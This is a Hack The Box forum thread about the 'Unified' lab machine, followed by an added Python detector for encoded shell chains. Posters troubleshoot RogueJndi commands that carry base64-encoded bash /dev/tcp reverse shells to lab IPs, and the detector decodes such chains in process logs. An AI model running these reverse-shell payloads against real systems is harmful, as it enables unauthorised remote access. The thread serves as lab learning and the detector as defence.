HTB Unified

Hello, I have been trying to pwn the Unified machine. All goes well until getting to the ncat listening on port 4444. Ran the following command without an issue:
$ echo 'bash -c bash -i >&/dev/tcp/10.10.14.27/4444 0>&1' | base64
YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTQuMjcvNDQ0NCAwPiYxCg==
RogueJndi works and the payload gets sent and Jndi gets the request, but nothing shows on ncat. I’ve tried everything I know, please help.

Thanks

Hi,

Was facing similar issues - I don’t know your setup, but for me, within a Kali vanilla installation, I ran:
sudo nc -nlvp 4444 instead of just nc -nlvp 4444.

No clue why I had to use sudo :man_shrugging:

Still #worthatry

Thanks for the suggestion I will give it a try.

[I know older post, but answering for future referencing]

I struggled at the same point: no shell spawning, but rogueJndi registering the payload.
In my case, the hard-to-spot issue was very likely a line break in one of the commands which I had copied over from blogposts before adjusting. You can check in an editor if that might be the case.

@TheConcierge using sudo with nmap should only be required for lower ports from 0-1024. If you have used one of these, that could be the answer to your wondering, but for 4444 this shouldn’t have made a difference…

Try changing the starting point VPN you are using (worked for me). Either that or wait until the VIP that HTB assigned you expires/changes.

Hi! I have the same problem as NeoMatrix1217. I have tried everything but can’t get the netcat to spawn the shell. I have made sure there are no breaks or spaces in the shell:

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}" --hostname "10.10.15.123"

Please, if anybody has a suggestion, it will be very much appreciated.
Thanks!

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,BASE64 YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}" --hostname "10.10.15.123"

You have to remove BASE64, i.e:

java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyBiYXNoIC1pID4mL2Rldi90Y3AvMTAuMTAuMTUuMTIzLzQ0NDQgMD4mMQo=} | {base64,-d} | {bash,-i}" --hostname "10.10.15.123"

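Added example, not part of any post in this thread: seen from the defender's side, the `{echo,...} | {base64,-d} | {bash,-i}` chain discussed above is a recognizable pattern in process command-line logs. The sketch below finds the chain, decodes the blob strictly, and reports the `/dev/tcp` callback endpoint; it also flags the malformed variant (a stray word or break inside the blob) that the thread describes. Function names, the sample log lines and the 192.0.2.10 address are constructed for illustration.

```python
import base64
import re

# Brace-expansion chain as quoted in the thread: {echo,<blob>} | {base64,-d} | {bash,-i}
CHAIN = re.compile(
    r"\{echo,(?P<blob>[^}]*)\}\s*\|\s*\{base64,-d\}\s*\|\s*\{(?:ba)?sh(?:,[^}]*)?\}"
)
# Bash /dev/tcp redirection inside the decoded text gives the callback endpoint
DEV_TCP = re.compile(r"/dev/tcp/(?P<host>[\w.-]+)/(?P<port>\d{1,5})")


def analyze_cmdline(cmdline):
    """Return a finding dict if the decode-to-shell chain is present, else None."""
    m = CHAIN.search(cmdline)
    if not m:
        return None
    blob = m.group("blob").strip()
    finding = {"blob": blob, "decoded": None, "callback": None, "note": ""}
    try:
        # validate=True rejects spaces, line breaks and placeholder words
        decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
    except ValueError:
        finding["note"] = "chain present but blob is not valid base64"
        return finding
    finding["decoded"] = decoded.strip()
    cb = DEV_TCP.search(decoded)
    if cb:
        finding["callback"] = (cb.group("host"), int(cb.group("port")))
        finding["note"] = "decoded payload opens a /dev/tcp socket"
    return finding


def _sample(payload, prefix=""):
    # Build a constructed log line; the blob is encoded here rather than typed in
    blob = base64.b64encode(payload.encode()).decode()
    return "bash -c {echo,%s%s} | {base64,-d} | {bash,-i}" % (prefix, blob)


# Constructed process command lines (not taken from any real host)
SAMPLE_CMDLINES = [
    _sample("bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n"),
    _sample("bash -i >& /dev/tcp/192.0.2.10/4444 0>&1\n", prefix="BASE64 "),
    "/usr/bin/java -jar app.jar --port 8443",
]


def scan(cmdlines):
    return [analyze_cmdline(c) for c in cmdlines]


if __name__ == "__main__":
    for line, f in zip(SAMPLE_CMDLINES, scan(SAMPLE_CMDLINES)):
        print((f["note"] if f else "no chain"), "|", line[:60])
```

A finding with a valid callback is worth correlating with outbound connection logs for the same host and port; a finding with an invalid blob still shows that the chain was attempted.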